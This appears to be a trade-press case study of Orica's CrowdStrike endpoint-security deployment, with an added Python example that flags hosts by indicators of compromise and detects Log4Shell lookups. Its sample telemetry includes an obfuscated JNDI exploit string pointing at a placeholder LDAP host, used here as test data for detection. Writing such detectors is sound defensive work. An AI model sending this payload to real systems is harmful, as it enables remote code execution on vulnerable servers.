Even as network links, vulnerabilities and cyber-threats multiply, there are some tools that can automate and streamline many cybersecurity tasks. The trick is combining them with human forethought, awareness, training and follow-up.
For instance, to protect its laptops, devices and mining system endpoints worldwide, Orica Ltd. previously used antivirus software, but CISO Sean Lasinker reports it was complex to support, inefficient and drained resources, because each newly detected cyber-risk had to be investigated and resolved manually. Endpoint detection, protection and response were basic and slow, and offered minimal visibility and limited threat-hunting. The company supplies explosives, blasting systems, mining chemicals, geotechnical monitoring, digital solutions and services to help clients discover and extract raw materials. Because it's at the forefront of research and development in new mining and blasting technologies, Orica must ensure that related data is safeguarded to protect intellectual property.
"Ensuring our operational technology is used correctly and we're prepared to respond to a cyberattack is of the utmost importance," says Lasinker. "The intention was always to aim for the next generation of endpoint security as part of our overall security strategy."
Automation simplifies the hunt
Orica settled on CrowdStrike due to ease of deployment, ongoing management and seamless integration with existing security and business systems, such as its secure web gateways and an email security solution. It deployed CrowdStrike's FalconX automated threat detection in all areas of its IT environment, which must protect digital systems and IIoT products sold to customers, its own business systems hosted on AWS and Azure cloud-computing services, and the OT and manufacturing systems that support its global plants. This environment comprises 8,700 endpoints at Orica's sites worldwide, including those of its engineers working at clients' mining facilities. The company also implemented Falcon OverWatch to manage threat hunting, and CrowdStrike's Incident Response and Advisory Service, which lets it prepare to react quickly and effectively to any incidents, and assess and thwart potential cyber-threats.
"We've already used the CrowdStrike Incident Response and Advisory Service twice to investigate suspected security incidents that were thankfully false positives," explained Lasinker. "Speed of response and resolution were impressive, but more importantly gave us confidence and reassurance. The standout feature of CrowdStrike that makes a difference to our business is its single-pane-of-glass visibility of endpoint security. As a security expert, having that information at my fingertips in real time and being able to act at the click of a button saves lots of time. The visibility we have compared to before is like night and day. With CrowdStrike and the way it's been deployed across Orica, we know we can rely on the accuracy and validity of our data."
Lasinker reports another CrowdStrike highlight is its ability to isolate multiple hosts at the same time. It can highlight several endpoints that share specific indicators of compromise and act on all of them swiftly. "CrowdStrike enables us to quickly spot live incidents, gain greater visibility and discover unknown services, which is extremely efficient," adds Lasinker. For example, CrowdStrike helped Orica deal with the 2021 Log4Shell threat with no impact. Log4Shell was a vulnerability in the Apache Log4j Java logging library that allowed arbitrary code execution and affected multiple global organizations.
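The triage step described above, flagging every endpoint that carries a known indicator of compromise and producing one containment list for all of them, is shown below as an added illustration. This is not CrowdStrike's or Orica's code and uses none of the Falcon APIs; the telemetry records, the indicator values and the field names are all constructed for the example. The Log4Shell check matches the JNDI lookup string that the vulnerable Log4j versions expanded, after undoing the `${lower:...}`/`${upper:...}` nesting that was commonly used to evade naive string matching.

```python
"""Added example: match endpoint telemetry against indicators of compromise
and build a single containment list. Not vendor code; all data is constructed."""
import re
from dataclasses import dataclass, field

# Constructed indicator set (placeholder values, not real IoCs).
IOC_HASHES = {"PLACEHOLDER_SHA256_OF_KNOWN_BAD_BINARY"}
IOC_DOMAINS = {"c2.bad-example.invalid"}

# Nested case-changing lookups such as "${lower:j}" collapse to their argument.
_NESTED_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)


def normalize_lookup(text: str) -> str:
    """Repeatedly strip ${lower:x}/${upper:x} wrappers until the text is stable."""
    previous = None
    while previous != text:
        previous = text
        text = _NESTED_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def has_jndi_lookup(line: str) -> bool:
    """True if a log line contains a Log4j JNDI lookup after de-obfuscation."""
    return "${jndi:" in normalize_lookup(line).lower()


@dataclass
class Endpoint:
    """Minimal constructed view of one host's telemetry (field names assumed)."""
    hostname: str
    process_hashes: set = field(default_factory=set)
    dns_queries: set = field(default_factory=set)
    log_lines: list = field(default_factory=list)


def indicators_for(ep: Endpoint) -> list:
    """Return the list of indicator labels observed on one endpoint."""
    hits = [f"hash:{h}" for h in sorted(ep.process_hashes & IOC_HASHES)]
    hits += [f"dns:{d}" for d in sorted(ep.dns_queries & IOC_DOMAINS)]
    if any(has_jndi_lookup(line) for line in ep.log_lines):
        hits.append("log4shell-lookup")
    return hits


def containment_plan(endpoints: list) -> dict:
    """Map hostname -> indicators for every endpoint that needs isolating."""
    return {ep.hostname: hits for ep in endpoints if (hits := indicators_for(ep))}


def isolate(plan: dict, contain) -> list:
    """Call the supplied containment action once per flagged host, in one pass."""
    hosts = sorted(plan)
    for host in hosts:
        contain(host)
    return hosts


# Constructed telemetry for three hosts; two of them carry indicators.
SAMPLE_ENDPOINTS = [
    Endpoint("site-eng-01", dns_queries={"c2.bad-example.invalid", "update.example.com"}),
    Endpoint("plant-hmi-07", log_lines=[
        "GET /index HTTP/1.1 200",
        "User-Agent: ${${lower:j}ndi:ldap://placeholder.invalid/a}",
    ]),
    Endpoint("hq-laptop-22", process_hashes={"PLACEHOLDER_SHA256_OF_BENIGN_BINARY"}),
]

if __name__ == "__main__":
    plan = containment_plan(SAMPLE_ENDPOINTS)
    isolated = isolate(plan, lambda h: print(f"would isolate {h}: {plan[h]}"))
    print(isolated)
```

The `contain` callback is where a real deployment would call the platform's containment action; here it only prints, so the script runs offline. Keeping the decision (`containment_plan`) separate from the action (`isolate`) lets an analyst review the list before anything is isolated, which is the step the article's "act at the click of a button" collapses.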
Security saves time and money
Following its deployment, Orica evaluated its CrowdStrike investment and found that, over a three-year period, it's expected to save more than $1.5 million Australian, pay for itself in 16.5 months, and deliver a 115% return on investment (ROI). In addition, CrowdStrike's real-time response and remediation virtually eliminated the three weeks it used to take to recover and rebuild devices for remote workers. Finally, CrowdStrike also reduces the workload of the small team that manages Orica's global security 24/7, for example by cutting the four hours previously required to triage an incident down to 10 minutes.
"As a CISO, there are three aspects of cybersecurity we need to be good at: patching and vulnerability management, regular backups and testing of those backups, and endpoint security. CrowdStrike handles the latter across Orica's whole enterprise and is a critical security solution for us."